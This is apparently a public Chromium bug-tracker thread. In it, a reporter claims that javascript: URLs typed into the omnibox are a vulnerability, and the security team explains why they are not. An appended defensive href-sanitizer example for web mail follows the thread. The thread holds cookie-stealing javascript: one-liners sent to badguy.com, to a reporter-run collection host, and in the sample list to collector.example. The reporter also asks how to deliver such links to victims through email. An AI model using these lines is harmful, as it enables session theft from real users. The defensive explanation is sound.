Issue 716434

Issue metadata

Status: Duplicate
Merged: issue 81697
Owner: ----
Closed: Apr 2017
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: ----
Type: Bug-Security




Security: stealing and downloading batch to the victim (JavaScript runs from the omnibox)

Reported by mohacker...@gmail.com, Apr 28 2017

Issue description

VULNERABILITY DETAILS
This vulnerability allows the hacker to steal cookies or download any
batch or add anything to the victim's browser and device.
VERSION
Chrome Version: [all versions]
Operating System: [all the operating systems]
The vulnerability should be classified under [Sandbox Escape, Renderer Remote Code Execution, Universal XSS (local bypass or equivalent), Information Leak,
Download Protection bypass] and more.
REPRODUCTION CASE
The vulnerability can be classified under XSS, or more than that: it allows the hacker to do anything, literally anything, on the victim's device.
The steps to reproduce the vulnerability are very simple, through this code:

   javascript:window.location.replace("http://your virus or steal cookies ");

Just open a new tab in your browser, paste the code, then press Enter; you will be
redirected without any warning to the code, or to steal the victim's cookies.
FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: [tab, browser, etc.]

If you have any questions, just ask me.

Regards ,

Justin
 
Labels: -Restrict-View-SecurityTeam allpublic
Status: WontFix (was: Unconfirmed)
Summary: Security: stealing and downloading batch to the victim (JavaScript runs from the omnibox) (was: Security: stealing and downloading batch to the victim )
This does not describe an attack against the user. Putting the same HTTP URL in the omnibox without using JavaScript would have the same behavior.

Now, if your repro script were something like

   javascript:window.location.replace("http://badguy.com/?collectdata=" + document.cookie);

...that would indeed take the user's non-HTTPOnly cookies from their current page and send them to the other site. However, this does not represent a vulnerability.

See https://dev.chromium.org/Home/chromium-security/security-faq#TOC-Does-entering-JavaScript:-URLs-in-the-URL-bar-or-running-script-in-the-developer-tools-mean-there-s-an-XSS-vulnerability- for discussion.
Man, it does, and I've tested it; you can paste this JavaScript code in your browser and your cookies will be sent to my log.txt file:

   javascript:window.location.replace("http://www.thebm.ml/invok.php?cookie="  + document.cookie);

It works 100%.

Comment 3 Deleted

Comment #3 deleted, as this is a public-visible issue.

As noted in #1, this does not represent a vulnerability.

See https://dev.chromium.org/Home/chromium-security/security-faq#TOC-Does-entering-JavaScript:-URLs-in-the-URL-bar-or-running-script-in-the-developer-tools-mean-there-s-an-XSS-vulnerability- for discussion.
But why doesn't it represent a vulnerability? I mean, when the victim goes to that script, his cookies will be stolen and sent to my server.

It's not a vulnerability because no reasonable user would be willing to run your JavaScript in his browser's address box.

An "unreasonable" user might be willing to do so, but that user would also be willing to visit your website and type his password directly into your site, achieving the same effect. 
OK, is there anything called an XSS vulnerability in Google Chrome??

Hi, maybe you didn't get what I meant by "is there anything called an XSS vulnerability in Google Chrome??" I mean, can XSS vulnerabilities in the browser be exploited like normal website XSS vulnerabilities?
Please reply, because I am new to this browser XSS issue.

Regards ,
Justin
Unfortunately, the Chromium Security team can't really scale to individual instruction on web vulnerability classes. Instead, I can suggest you look through https://sites.google.com/site/bughunteruniversity/, https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29, and the book "The Tangled Web".
OK, no problem, but I have one last question about the vulnerability
I mentioned before: would it be considered valid if it were executed from, for example, a Gmail message sent to the victim, where the link sent to the victim contains that code to steal cookies, and as a result that code steals the current user session and sends it to the attacker? Would you or the Google team consider it a valid vulnerability??

thank you in advance ,

Regards ,

Justin
If a web email client (Gmail/Outlook/YahooMail/etc) allowed a JavaScript link to be sent to a user and clicking the link resulted in script execution, yes, that would be a security vulnerability in the web mail application, and I expect the product owner would rapidly fix it.
OK, thank you, but what about sending a link through Gmail, for example,
where once the victim clicks on it his cookies are stolen
and sent to the attacker, and that link looks like
http://demo.thebm.ml/test.htm? Or should it be something like
<script>alert('test')</script> sent to the victim to be considered a valid vulnerability? I mean, if it was a link like
http://demo.thebm.ml/test.htm, would that be considered a valid vulnerability,
or should it be a script??


Regards, 

Justin 
I encourage you to read through the resources I mentioned in comment #9. 

Web mail clients, as a matter of design, remove links and markup that attempts to execute JavaScript within their application's security context.
Mergedinto: 81697
Status: Duplicate (was: WontFix)
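The design point in the closing comment above, that web mail clients remove links and markup which would execute script inside their own security context, is the defensive counterpart to this report. The following is an added example, not Chromium code and not code from anyone in this thread: an href scheme allowlist of the kind such a client applies to links in incoming HTML mail before rendering them. The allowed scheme set, the small entity-decoding subset, the base origin webmail.example and the sample hrefs are assumptions for illustration. It handles the usual evasions of a naive string check (mixed case, embedded tabs and newlines, numeric character references) by normalizing the value the way the HTML and URL parsers would before deciding.

```javascript
// Added example, not Chromium code and not from this bug thread: an href
// scheme allowlist of the kind a web mail client applies to links in incoming
// HTML mail before rendering them in its own security context. The allowed
// scheme set, the entity subset, the base URL and the sample hrefs are assumed.

const ALLOWED_SCHEMES = new Set(["http:", "https:", "mailto:"]);

function codePointToString(cp) {
  // Out-of-range references are replaced rather than allowed to throw.
  return cp > 0x10ffff ? "\uFFFD" : String.fromCodePoint(cp);
}

// Decode the character references an HTML parser would decode before the
// attribute value ever reaches the URL parser, so "&#106;avascript:" is seen
// as "javascript:". A real sanitizer runs the full HTML parser first; this is
// a deliberately small subset (numeric references plus a few named ones,
// matched liberally regardless of case).
function decodeEntities(s) {
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => codePointToString(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => codePointToString(parseInt(d, 10)))
    .replace(/&tab;/gi, "\t")
    .replace(/&newline;/gi, "\n")
    .replace(/&colon;/gi, ":")
    .replace(/&amp;/gi, "&");
}

// The WHATWG URL parser strips leading and trailing C0 controls and spaces
// and removes every tab, CR and LF from the input, so " java\nscript:" parses
// as "javascript:". Apply the same normalization so the check sees exactly
// what the browser would see.
function normalizeHref(raw) {
  return decodeEntities(String(raw))
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "")
    .replace(/[\t\n\r]/g, "");
}

function isSafeHref(raw) {
  const href = normalizeHref(raw);
  if (href === "") return false;
  // Relative links ("/inbox", "#top") have no scheme of their own; resolving
  // them against the client's origin yields the scheme they would really get.
  let parsed;
  try {
    parsed = new URL(href, "https://webmail.example/");
  } catch {
    return false;
  }
  return ALLOWED_SCHEMES.has(parsed.protocol);
}

// Links that fail the check get an inert href rather than being dropped
// silently, so the rendered mail still shows where a link used to be.
function sanitizeHref(raw) {
  return isSafeHref(raw) ? normalizeHref(raw) : "about:blank#blocked";
}

// Constructed sample hrefs, of the kind an HTML mail body might contain.
const SAMPLE_HREFS = [
  "https://example.com/report",
  "/inbox?folder=sent",
  "mailto:alice@example.com",
  "javascript:window.location.replace('https://collector.example/?c=' + document.cookie)",
  "JaVaScRiPt:alert(1)",
  " \tjava\nscript:alert(1)",
  "&#106;avascript:alert(1)",
  "data:text/html,<script>alert(1)</script>",
  "vbscript:MsgBox(1)",
];

function sanitizeAll(hrefs) {
  return hrefs.map((h) => ({ input: h, output: sanitizeHref(h) }));
}

for (const { input, output } of sanitizeAll(SAMPLE_HREFS)) {
  console.log(JSON.stringify(input), "->", output);
}
```

Of the nine constructed hrefs only the first three survive; everything carrying a javascript:, data: or vbscript: scheme, however it is cased, padded or entity-encoded, is rewritten to the inert placeholder. An allowlist is used rather than a denylist of bad schemes because the set of schemes a renderer will execute is open-ended, while the set a mail client needs to link to is small. The other defensive lever mentioned earlier in the thread is the HttpOnly cookie attribute, which keeps a session cookie out of document.cookie even where script does run.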
